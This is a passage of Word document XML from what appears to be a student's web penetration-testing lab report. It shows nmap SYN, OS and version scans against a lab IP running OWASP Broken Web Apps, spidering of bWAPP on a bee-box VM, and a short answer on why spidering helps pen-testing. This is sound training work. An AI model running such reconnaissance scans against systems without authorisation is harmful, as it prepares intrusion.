      <w:r w:rsidR="00B46D3D" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>their respective o</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>utput</w:t>
      </w:r>
      <w:r w:rsidR="00B46D3D" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E27F9C3" w14:textId="4127A94A" w:rsidR="00A0703C" w:rsidRPr="00A0703C" w:rsidRDefault="00A0703C" w:rsidP="00A0703C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673A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="008E19AC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072F23" w14:paraId="633E50D2" w14:textId="77777777" w:rsidTr="00233040">
        <w:trPr>
          <w:trHeight w:val="4803"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FB1D3D" w14:textId="723B95D0" w:rsidR="0099271D" w:rsidRPr="0099271D" w:rsidRDefault="0099271D" w:rsidP="0099271D">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Sudo nmap -sS -Pn -T4 -p- 192.168.184.131</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0622480D" w14:textId="5AE75D82" w:rsidR="0099271D" w:rsidRPr="008B3C5F" w:rsidRDefault="0099271D" w:rsidP="0099271D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sS</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: TCP SYN scans</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C32C953" w14:textId="77777777" w:rsidR="0099271D" w:rsidRPr="008B3C5F" w:rsidRDefault="0099271D" w:rsidP="0099271D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Pn</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Treat all hosts as online -- skip host discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7362749A" w14:textId="77777777" w:rsidR="0099271D" w:rsidRPr="008B3C5F" w:rsidRDefault="0099271D" w:rsidP="0099271D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T&lt;0-5&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Set timing template (higher is faster)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2320371A" w14:textId="77777777" w:rsidR="0099271D" w:rsidRPr="008B3C5F" w:rsidRDefault="0099271D" w:rsidP="0099271D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p &lt;port ranges&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Only scan specified ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25EE9D5D" w14:textId="77777777" w:rsidR="0099271D" w:rsidRPr="008B3C5F" w:rsidRDefault="0099271D" w:rsidP="0099271D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OWASPBWA_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: owaspbwa VM IP Address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08FC610C" w14:textId="77777777" w:rsidR="00072F23" w:rsidRDefault="0099271D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mmand to scan </w:t>
            </w:r>
            <w:r w:rsidR="00055C60">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>and list open ports as well as the running services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D11DC5" w14:textId="77777777" w:rsidR="00DB0FE5" w:rsidRDefault="00DB0FE5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08165D" w14:textId="77777777" w:rsidR="00DB0FE5" w:rsidRDefault="00DB0FE5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0FE5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0F77374" wp14:editId="5014F066">
                  <wp:extent cx="3985605" cy="24233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242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2455A" w14:textId="77777777" w:rsidR="00DB0FE5" w:rsidRDefault="00DB0FE5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44878" w14:textId="6F038509" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F">
            <w:r w:rsidRPr="008B3C5F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo nmap -O -A -Pn -T4 -p80,443 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>192.168.184.131</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="670D1303" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F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O</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Enable OS detection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9F37D2" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F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A</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Enable OS detection, version detection, script scanning, and traceroute</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262D7C69" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F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Pn</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Treat all hosts as online -- skip host discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A0A8B35" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F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T&lt;0-5&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Set timing template (higher is faster)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418B3989" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F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-p &lt;port ranges&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: Only scan specified ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152B08F9" w14:textId="77777777" w:rsidR="00A6550F" w:rsidRPr="008B3C5F" w:rsidRDefault="00A6550F" w:rsidP="00A6550F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3C5F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>OWASPBWA_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3C5F">
              <w:t>: owaspbwa VM IP Address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F3B1D9" w14:textId="77777777" w:rsidR="00DB0FE5" w:rsidRDefault="000242FF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and to see the software versions, as well as see the server OS details</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5419E5D3" w14:textId="77777777" w:rsidR="00A4147A" w:rsidRDefault="00A4147A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06502B" w14:textId="6141047F" w:rsidR="00A4147A" w:rsidRDefault="00A4147A" w:rsidP="009927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147A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1656694F" wp14:editId="0C12C821">
                  <wp:extent cx="5732145" cy="2322830"/>
                  <wp:effectExtent l="0" t="0" r="190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119C7" w14:textId="77777777" w:rsidR="00B66B31" w:rsidRPr="007E1090" w:rsidRDefault="00B66B31" w:rsidP="00A0703C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F2EC3B" w14:textId="08BBAEC8" w:rsidR="00D601E9" w:rsidRDefault="00D601E9" w:rsidP="00D601E9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7937F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an appropriate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tool </w:t>
      </w:r>
      <w:r w:rsidR="001B3893">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">targeting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the web server </w:t>
      </w:r>
      <w:r w:rsidR="00ED1777">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">running the OWASP Broken Web Apps (owaspbwa) to detect the </w:t>
      </w:r>
      <w:r w:rsidR="00AB6DBD" w:rsidRPr="00AB6DBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6DBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Server OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidR="00AB6DBD" w:rsidRPr="003D2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="003D2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and its output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55687569" w14:textId="51D21EA1" w:rsidR="00D601E9" w:rsidRPr="00D601E9" w:rsidRDefault="002673A0" w:rsidP="002673A0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2C4758" w14:paraId="15E05081" w14:textId="77777777" w:rsidTr="00233040">
        <w:trPr>
          <w:trHeight w:val="3583"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5379C32F" w14:textId="77777777" w:rsidR="002C4758" w:rsidRDefault="008A35AF" w:rsidP="00D60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do nmap -O -A -Pn </w:t>
            </w:r>
            <w:r w:rsidR="00567148">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>192.168.184.131</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D44194" w14:textId="77777777" w:rsidR="001118FF" w:rsidRDefault="001118FF" w:rsidP="00D60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9FA741" w14:textId="447E50E8" w:rsidR="001118FF" w:rsidRDefault="001118FF" w:rsidP="00D601E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18FF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3CF29B50" wp14:editId="423D2D65">
                  <wp:extent cx="5732145" cy="4659630"/>
                  <wp:effectExtent l="0" t="0" r="1905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65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25D68" w14:textId="77777777" w:rsidR="00D601E9" w:rsidRPr="00D601E9" w:rsidRDefault="00D601E9" w:rsidP="00D601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9CF7B1" w14:textId="11F373A6" w:rsidR="00233040" w:rsidRPr="002135A4" w:rsidRDefault="00233040" w:rsidP="00233040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625E2B49" w14:textId="43A8632C" w:rsidR="00233040" w:rsidRDefault="00233040" w:rsidP="002330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F16DD8" w14:textId="4B9025AF" w:rsidR="00233040" w:rsidRDefault="00233040" w:rsidP="002330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539E5837" w14:textId="77777777" w:rsidR="00233040" w:rsidRPr="00233040" w:rsidRDefault="00233040" w:rsidP="0023304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A21237" w14:textId="754B3C88" w:rsidR="00056CF3" w:rsidRDefault="006923DD" w:rsidP="00431D23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 appropriate tool to </w:t>
      </w:r>
      <w:r w:rsidR="00134171" w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="008A7D24" w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00576C99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="004452AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bWAPP website running </w:t>
      </w:r>
      <w:r w:rsidR="00134171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in the</w:t>
      </w:r>
      <w:r w:rsidR="004452AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541719">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bee-box v1.6 VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6A6E7" w14:textId="77777777" w:rsidR="00056CF3" w:rsidRPr="00056CF3" w:rsidRDefault="00056CF3" w:rsidP="00056CF3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E7ED2FC" w14:textId="0F1E5672" w:rsidR="00622690" w:rsidRDefault="00503D2C" w:rsidP="00056CF3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the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">tool’s </w:t>
      </w:r>
      <w:r w:rsidR="00BC0576" w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>input parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its </w:t>
      </w:r>
      <w:r w:rsidR="0015728F" w:rsidRPr="000F7903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>spidering output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BB6457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="008A7D24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You may stop the scan </w:t>
      </w:r>
      <w:r w:rsidR="00FE2FEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>halfway</w:t>
      </w:r>
      <w:r w:rsidR="008A7D24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in case it is taking longer than usual time to complete</w:t>
      </w:r>
      <w:r w:rsidR="00BB6457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008A7D24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB6457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149C88E" w14:textId="2A66916F" w:rsidR="00622690" w:rsidRDefault="00F63015" w:rsidP="00F63015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A5577" w14:paraId="550DFB03" w14:textId="77777777" w:rsidTr="00F63E59">
        <w:trPr>
          <w:trHeight w:val="2028"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6474D71A" w14:textId="77777777" w:rsidR="00BA5577" w:rsidRDefault="001B2CA7" w:rsidP="00BA5577">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B2CA7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27E2A9AC" wp14:editId="3D93E255">
                  <wp:extent cx="5732145" cy="1966595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DEAE0" w14:textId="77777777" w:rsidR="001B2CA7" w:rsidRDefault="001B2CA7" w:rsidP="00BA55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FB98B" w14:textId="716CDFAD" w:rsidR="001B2CA7" w:rsidRDefault="001B2CA7" w:rsidP="00BA55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E61DED" w14:textId="77777777" w:rsidR="00F63015" w:rsidRPr="00622690" w:rsidRDefault="00F63015" w:rsidP="00BA5577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2E46679D" w14:textId="0616D555" w:rsidR="00622690" w:rsidRDefault="00BB6457" w:rsidP="00056CF3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54D55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How does this task of Spidering help in web application pen-testing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502D540" w14:textId="7958B139" w:rsidR="00F63015" w:rsidRPr="00F63015" w:rsidRDefault="00232BCA" w:rsidP="00232BCA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BA5577" w14:paraId="6A72E4DC" w14:textId="77777777" w:rsidTr="00F63E59">
        <w:trPr>
          <w:trHeight w:val="2002"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5807E1" w14:textId="77777777" w:rsidR="00BA5577" w:rsidRDefault="009A0676" w:rsidP="00BA5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dering allows us to get a complete map of all the referenced pages within the site and record the requests made to get them and their responses. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FE275B" w14:textId="77777777" w:rsidR="009A0676" w:rsidRDefault="009A0676" w:rsidP="00BA557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C89E6F" w14:textId="258C729D" w:rsidR="009A0676" w:rsidRPr="009A0676" w:rsidRDefault="009A0676" w:rsidP="00BA55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does this by following all links and sometimes filling in and sending forms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E01CE92" w14:textId="77777777" w:rsidR="00622690" w:rsidRPr="00BA5577" w:rsidRDefault="00622690" w:rsidP="00BA5577">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2213FA" w14:textId="2500643C" w:rsidR="006923DD" w:rsidRPr="00FA3948" w:rsidRDefault="00D82668" w:rsidP="00056CF3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A3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the Spidering output, </w:t>
      </w:r>
      <w:r w:rsidRPr="006B7F8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00D65A08" w:rsidRPr="006B7F8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ist </w:t>
      </w:r>
      <w:r w:rsidR="00232BCA" w:rsidRPr="006B7F8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>and justify</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65A08" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">at least </w:t>
      </w:r>
      <w:r w:rsidR="0016409D" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ONE interesting </w:t>
      </w:r>
      <w:r w:rsidR="00B17B44" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">file/page </w:t>
      </w:r>
      <w:r w:rsidR="00D65A08" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">may be </w:t>
      </w:r>
      <w:r w:rsidR="00EC36D7" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">used by the hackers to </w:t>
      </w:r>
      <w:r w:rsidR="002F4701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attempt hacking, </w:t>
      </w:r>
      <w:r w:rsidR="00C76E83" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidR="00C76E83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing,</w:t>
      </w:r>
      <w:r w:rsidR="00EC36D7" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and exploit</w:t>
      </w:r>
      <w:r w:rsidR="002F4701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00EC36D7" w:rsidRPr="00FA3948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74422C15" w14:textId="77777777" w:rsidR="005D3CF4" w:rsidRPr="00F63015" w:rsidRDefault="003E3CA2" w:rsidP="005D3CF4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5D3CF4" w14:paraId="4971F74C" w14:textId="77777777" w:rsidTr="008D784A">
        <w:trPr>
          <w:trHeight w:val="3018"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
